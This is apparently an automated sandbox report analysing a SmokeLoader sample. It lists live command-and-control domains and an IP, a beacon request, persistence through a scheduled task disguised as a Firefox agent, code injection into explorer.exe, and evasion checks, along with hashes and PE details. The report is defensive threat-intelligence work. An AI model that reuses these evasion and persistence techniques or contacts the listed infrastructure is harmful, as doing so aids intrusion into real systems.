                    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Obfuscated Files or Information
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    DLL Side-Loading
                    Cached Domain Credentials4
                    System Information Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    File Deletion
                    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 652394 Sample: p3jNeWT0GE.exe Startdate: 26/06/2022 Architecture: WINDOWS Score: 100 30 Multi AV Scanner detection for domain / URL 2->30 32 Antivirus detection for URL or domain 2->32 34 Yara detected SmokeLoader 2->34 36 2 other signatures 2->36 7 p3jNeWT0GE.exe 2->7         started        10 hdgaecu 2->10         started        process3 signatures4 46 Contains functionality to inject code into remote processes 7->46 48 Injects a PE file into a foreign processes 7->48 12 p3jNeWT0GE.exe 7->12         started        50 Machine Learning detection for dropped file 10->50 15 hdgaecu 10->15         started        process5 signatures6 52 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->52 54 Maps a DLL or memory area into another process 12->54 56 Checks if the current machine is a virtual machine (disk enumeration) 12->56 17 explorer.exe 2 12->17 injected 58 Creates a thread in another existing process (thread injection) 15->58 process7 dnsIp8 26 host-file-host6.com 47.89.255.79, 49800, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\hdgaecu, PE32 17->22 dropped 24 C:\Users\user\...\hdgaecu:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    p3jNeWT0GE.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\hdgaecu100%Joe Sandbox ML
                    SourceDetectionScannerLabelLinkDownload
                    1.0.p3jNeWT0GE.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.p3jNeWT0GE.exe.c215a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.0.hdgaecu.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.0.hdgaecu.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    12.2.hdgaecu.c215a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.2.p3jNeWT0GE.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.0.p3jNeWT0GE.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.2.hdgaecu.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    1.0.p3jNeWT0GE.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    13.0.hdgaecu.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    SourceDetectionScannerLabelLink
                    host-file-host6.com18%VirustotalBrowse
                    host-host-file8.com13%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://ns.adobY0%URL Reputationsafe
                    http://host-file-host6.com/0%URL Reputationsafe
                    http://host-host-file8.com/100%URL Reputationmalware
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    host-file-host6.com
                    47.89.255.79
                    truetrueunknown
                    host-host-file8.com
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    http://host-file-host6.com/true
                    • URL Reputation: safe
                    unknown
                    http://host-host-file8.com/true
                    • URL Reputation: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://ns.adobYexplorer.exe, 00000004.00000000.397114425.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.374277431.00000000026D0000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    47.89.255.79
                    host-file-host6.comUnited States
                    45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:652394
                    Start date and time: 26/06/202209:43:282022-06-26 09:43:28 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 43s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:p3jNeWT0GE.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@6/2@5/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 78.9% (good quality ratio 69.7%)
                    • Quality average: 57.7%
                    • Quality standard deviation: 32.1%
                    HCA Information:
                    • Successful, ratio: 70%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Adjust boot time
                    • Enable AMSI
                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information
                    TimeTypeDescription
                    09:45:40Task SchedulerRun new task: Firefox Default Browser Agent 48F1ADA0A38E1F04 path: C:\Users\user\AppData\Roaming\hdgaecu
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):293376
                    Entropy (8bit):6.884791106060294
                    Encrypted:false
                    SSDEEP:6144:HShclg/jkSrmFybCvqYNOpd5I165kcpe1+JAtGI8E2lxiz:yClIlmFO4qYNGI45kM2+JAtdyni
                    MD5:25B54F50600604A53E80163B9049421E
                    SHA1:BE28D831C5183368F057F8BEC104A2B0BABB406C
                    SHA-256:9904784C707ABB24585E3E61FA5CC094380206385CBB7D087C968D7DC5EE0991
                    SHA-512:3CBE8FAB28D77F7E7477C31DD3FC69E930FD3BE72B20411CC077592440E6EA487D3EDA66EBACE44C0C58FD35A9FC1AE5F1C3FB563FFAE33658930525DCB69027
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-\..i=..i=..i=...r..h=..wo..v=..wo...=..N...j=..i=...=..wo..V=..wo..h=..wo..h=..Richi=..........................PE..L......`......................p..............0....@...........................s.....(@..........................................(....`s..?..........................P..................................@............................................text............................... ..`.data.....p..0......................@....zineha.K....@s......6..............@....cixu...J....Ps......8..............@....rsrc....?...`s..@...:..............@..@........................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\explorer.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.884791106060294
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:p3jNeWT0GE.exe
                    File size:293376
                    MD5:25b54f50600604a53e80163b9049421e
                    SHA1:be28d831c5183368f057f8bec104a2b0babb406c
                    SHA256:9904784c707abb24585e3e61fa5cc094380206385cbb7d087c968d7dc5ee0991
                    SHA512:3cbe8fab28d77f7e7477c31dd3fc69e930fd3be72b20411cc077592440e6ea487d3eda66ebace44c0c58fd35a9fc1ae5f1c3fb563ffae33658930525dcb69027
                    SSDEEP:6144:HShclg/jkSrmFybCvqYNOpd5I165kcpe1+JAtGI8E2lxiz:yClIlmFO4qYNGI45kM2+JAtdyni
                    TLSH:32549E10B650C434F5F712F44ABA926CB63E7AA19B3491CF62D56AEE5B346E0EC31307
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-\..i=..i=..i=...r..h=..wo..v=..wo...=..N...j=..i=...=..wo..V=..wo..h=..wo..h=..Richi=..........................PE..L......`...
                    Icon Hash:aecaae9ecea62ea2
                    Entrypoint:0x40eec0
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:TERMINAL_SERVER_AWARE
                    Time Stamp:0x608DF612 [Sun May 2 00:45:06 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:9708e7dbb84fb2e34dfb5e05eada89dd
                    Instruction
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    call 00007F93ECC81C1Bh
                    call 00007F93ECC74586h
                    pop ebp
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    push FFFFFFFEh
                    push 00430CA0h
                    push 00412510h
                    mov eax, dword ptr fs:[00000000h]
                    push eax
                    add esp, FFFFFF94h
                    push ebx
                    push esi
                    push edi
                    mov eax, dword ptr [0044387Ch]
                    xor dword ptr [ebp-08h], eax
                    xor eax, ebp
                    push eax
                    lea eax, dword ptr [ebp-10h]
                    mov dword ptr fs:[00000000h], eax
                    mov dword ptr [ebp-18h], esp
                    mov dword ptr [ebp-70h], 00000000h
                    mov dword ptr [ebp-04h], 00000000h
                    lea eax, dword ptr [ebp-60h]
                    push eax
                    call dword ptr [004010DCh]
                    mov dword ptr [ebp-04h], FFFFFFFEh
                    jmp 00007F93ECC74598h
                    mov eax, 00000001h
                    ret
                    mov esp, dword ptr [ebp-18h]
                    mov dword ptr [ebp-78h], 000000FFh
                    mov dword ptr [ebp-04h], FFFFFFFEh
                    mov eax, dword ptr [ebp-78h]
                    jmp 00007F93ECC746C8h
                    mov dword ptr [ebp-04h], FFFFFFFEh
                    call 00007F93ECC74704h
                    mov dword ptr [ebp-6Ch], eax
                    push 00000001h
                    call 00007F93ECC82CDAh
                    add esp, 04h
                    test eax, eax
                    jne 00007F93ECC7457Ch
                    push 0000001Ch
                    call 00007F93ECC746BCh
                    add esp, 04h
                    call 00007F93ECC7C304h
                    test eax, eax
                    jne 00007F93ECC7457Ch
                    push 00000010h
                    Programming Language:
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [C++] VS2008 build 21022
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x313bc0x28.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7360000x3f98.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x13500x1c.text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb2f00x40.text
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x2fc.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x315ac0x31600False0.45167128164556963data6.39681715338854IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data0x330000x700da80x11c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .zineha0x7340000x4b0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .cixu0x7350000x4a0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x7360000x3f980x4000False0.73095703125data6.341519681079148IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x7361f00x25a8dataKoreanNorth Korea
                    RT_ICON0x7361f00x25a8dataKoreanSouth Korea
                    RT_ICON0x7387980x10a8dataKoreanNorth Korea
                    RT_ICON0x7387980x10a8dataKoreanSouth Korea
                    RT_STRING0x7399180x42dataKoreanNorth Korea
                    RT_STRING0x7399180x42dataKoreanSouth Korea
                    RT_STRING0x7399600x4aedataKoreanNorth Korea
                    RT_STRING0x7399600x4aedataKoreanSouth Korea
                    RT_STRING0x739e100x188dataKoreanNorth Korea
                    RT_STRING0x739e100x188dataKoreanSouth Korea
                    RT_ACCELERATOR0x7398a80x70dataKoreanNorth Korea
                    RT_ACCELERATOR0x7398a80x70dataKoreanSouth Korea
                    RT_ACCELERATOR0x7398680x40dataKoreanNorth Korea
                    RT_ACCELERATOR0x7398680x40dataKoreanSouth Korea
                    RT_GROUP_ICON0x7398400x22dataKoreanNorth Korea
                    RT_GROUP_ICON0x7398400x22dataKoreanSouth Korea
                    DLLImport
                    KERNEL32.dllDebugBreakProcess, FindFirstChangeNotificationW, GetNamedPipeHandleStateW, CreateIoCompletionPort, FillConsoleOutputCharacterW, DisableThreadLibraryCalls, TerminateProcess, GetProcessId, VerifyVersionInfoW, EnumDateFormatsW, FindNextFileW, CopyFileExA, BuildCommDCBAndTimeoutsA, VirtualUnlock, WriteProfileStringW, VerifyVersionInfoA, SetProcessPriorityBoost, GetDriveTypeW, FindFirstChangeNotificationA, GetFileType, DeleteFileA, FindNextVolumeMountPointA, OutputDebugStringA, ResetWriteWatch, WriteConsoleInputA, WriteConsoleInputW, GetConsoleTitleW, SetComputerNameExW, SetTimeZoneInformation, LoadLibraryA, GetSystemDirectoryA, GetDriveTypeA, GetShortPathNameW, ActivateActCtx, GetProfileSectionA, DeleteFileW, GetCommandLineW, InterlockedIncrement, AddRefActCtx, FindResourceA, FormatMessageA, GetModuleFileNameW, CreateJobObjectW, InitializeCriticalSection, SetFirmwareEnvironmentVariableW, GetDllDirectoryW, GetExitCodeThread, WritePrivateProfileStringW, GetConsoleAliasesLengthW, WriteProfileSectionW, AddAtomA, InterlockedDecrement, GetVersionExA, HeapSize, _hwrite, GetStartupInfoA, DisconnectNamedPipe, GetCPInfoExW, GetSystemWow64DirectoryW, GetPrivateProfileIntA, GetConsoleAliasExesW, DebugBreak, EndUpdateResourceW, SetLastError, InterlockedExchangeAdd, GetStringTypeExW, DeleteVolumeMountPointW, OpenFileMappingA, SetDefaultCommConfigW, lstrcpyA, TerminateThread, GetACP, _lwrite, GetQueuedCompletionStatus, GetNamedPipeHandleStateA, GetDiskFreeSpaceExW, RemoveVectoredExceptionHandler, WriteConsoleW, VirtualProtect, ReadConsoleOutputW, SetThreadContext, BuildCommDCBA, ReleaseActCtx, GetHandleInformation, WritePrivateProfileSectionW, DeleteCriticalSection, GetFileAttributesA, OpenWaitableTimerW, GetVolumePathNameW, SetConsoleMode, HeapSetInformation, SetComputerNameA, FindNextFileA, SetEvent, UnlockFile, GetProcAddress, DeleteTimerQueueTimer, CopyFileW, MoveFileA, GlobalAlloc, GetCommMask, SetFileShortNameA, GetFileAttributesW, FreeEnvironmentStringsW, GetProfileStringA, GetConsoleTitleA, SetComputerNameW, GetConsoleAliasesW, CreateMailslotA, EnumDateFormatsA, GetTimeZoneInformation, SetConsoleOutputCP, GetFileInformationByHandle, SetLocalTime, CallNamedPipeA, GetConsoleAliasExesLengthW, GetCurrentActCtx, OpenSemaphoreW, GetModuleHandleExA, LoadLibraryW, FoldStringW, GetTickCount, GetConsoleAliasesLengthA, GetLastError, LocalUnlock, GetFileTime, EnumResourceNamesW, OpenFileMappingW, UnhandledExceptionFilter, GetCompressedFileSizeW, GetThreadPriority, ReadConsoleA, AssignProcessToJobObject, Sleep, EnterCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwind, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, WideCharToMultiByte, GetCommandLineA, HeapValidate, IsBadReadPtr, GetModuleHandleA, TlsGetValue, GetModuleHandleW, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, GetStdHandle, WriteFile, OutputDebugStringW, ExitProcess, GetOEMCP, GetCPInfo, IsValidCodePage, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, HeapDestroy, HeapCreate, HeapFree, VirtualFree, FlushFileBuffers, GetConsoleCP, GetConsoleMode, HeapAlloc, HeapReAlloc, VirtualAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, LCMapStringA, LCMapStringW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, SetFilePointer, CloseHandle, CreateFileA
                    Language of compilation systemCountry where language is spokenMap
                    KoreanNorth Korea
                    KoreanSouth Korea
                    TimestampSource PortDest PortSource IPDest IP
                    Jun 26, 2022 09:45:40.786709070 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:40.966763973 CEST804980047.89.255.79192.168.2.7
                    Jun 26, 2022 09:45:40.966864109 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:40.966998100 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:40.967025042 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:41.150403023 CEST804980047.89.255.79192.168.2.7
                    Jun 26, 2022 09:45:41.516522884 CEST804980047.89.255.79192.168.2.7
                    Jun 26, 2022 09:45:41.516628981 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:41.526240110 CEST4980080192.168.2.747.89.255.79
                    Jun 26, 2022 09:45:41.707974911 CEST804980047.89.255.79192.168.2.7
                    TimestampSource PortDest PortSource IPDest IP
                    Jun 26, 2022 09:45:40.467047930 CEST5182453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:40.779170990 CEST53518248.8.8.8192.168.2.7
                    Jun 26, 2022 09:45:41.537991047 CEST6521453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:42.543178082 CEST6521453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:43.574409962 CEST6521453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:45.621850967 CEST6521453192.168.2.78.8.8.8
                    Jun 26, 2022 09:45:45.624289036 CEST53652148.8.8.8192.168.2.7
                    Jun 26, 2022 09:45:46.609745979 CEST53652148.8.8.8192.168.2.7
                    Jun 26, 2022 09:45:47.613452911 CEST53652148.8.8.8192.168.2.7
                    Jun 26, 2022 09:45:49.680742979 CEST53652148.8.8.8192.168.2.7
                    TimestampSource IPDest IPChecksumCodeType
                    Jun 26, 2022 09:45:46.609853983 CEST192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
                    Jun 26, 2022 09:45:47.613527060 CEST192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
                    Jun 26, 2022 09:45:49.680871010 CEST192.168.2.78.8.8.8cffa(Port unreachable)Destination Unreachable
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jun 26, 2022 09:45:40.467047930 CEST192.168.2.78.8.8.80x7150Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:41.537991047 CEST192.168.2.78.8.8.80xae74Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:42.543178082 CEST192.168.2.78.8.8.80xae74Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:43.574409962 CEST192.168.2.78.8.8.80xae74Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:45.621850967 CEST192.168.2.78.8.8.80xae74Standard query (0)host-host-file8.comA (IP address)IN (0x0001)
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jun 26, 2022 09:45:40.779170990 CEST8.8.8.8192.168.2.70x7150No error (0)host-file-host6.com47.89.255.79A (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:45.624289036 CEST8.8.8.8192.168.2.70xae74Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:46.609745979 CEST8.8.8.8192.168.2.70xae74Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:47.613452911 CEST8.8.8.8192.168.2.70xae74Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    Jun 26, 2022 09:45:49.680742979 CEST8.8.8.8192.168.2.70xae74Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)
                    • xcxakxdec.net
                      • host-file-host6.com
                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.74980047.89.255.7980C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Jun 26, 2022 09:45:40.966998100 CEST1413OUTPOST / HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://xcxakxdec.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 282
                    Host: host-file-host6.com
                    Jun 26, 2022 09:45:41.516522884 CEST3953INHTTP/1.1 200 OK
                    Server: nginx/1.20.1
                    Date: Sun, 26 Jun 2022 07:45:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: fYour IP blocked0


                    Click to jump to process

                    Target ID:0
                    Start time:09:44:39
                    Start date:26/06/2022
                    Path:C:\Users\user\Desktop\p3jNeWT0GE.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Imagebase:0x400000
                    File size:293376 bytes
                    MD5 hash:25B54F50600604A53E80163B9049421E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Target ID:1
                    Start time:09:44:44
                    Start date:26/06/2022
                    Path:C:\Users\user\Desktop\p3jNeWT0GE.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Imagebase:0x400000
                    File size:293376 bytes
                    MD5 hash:25B54F50600604A53E80163B9049421E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    Target ID:4
                    Start time:09:44:52
                    Start date:26/06/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff631f70000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                    Reputation:high

                    Target ID:12
                    Start time:09:45:40
                    Start date:26/06/2022
                    Path:C:\Users\user\AppData\Roaming\hdgaecu
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\hdgaecu
                    Imagebase:0x400000
                    File size:293376 bytes
                    MD5 hash:25B54F50600604A53E80163B9049421E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:13
                    Start time:09:45:43
                    Start date:26/06/2022
                    Path:C:\Users\user\AppData\Roaming\hdgaecu
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\hdgaecu
                    Imagebase:0x400000
                    File size:293376 bytes
                    MD5 hash:25B54F50600604A53E80163B9049421E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    No disassembly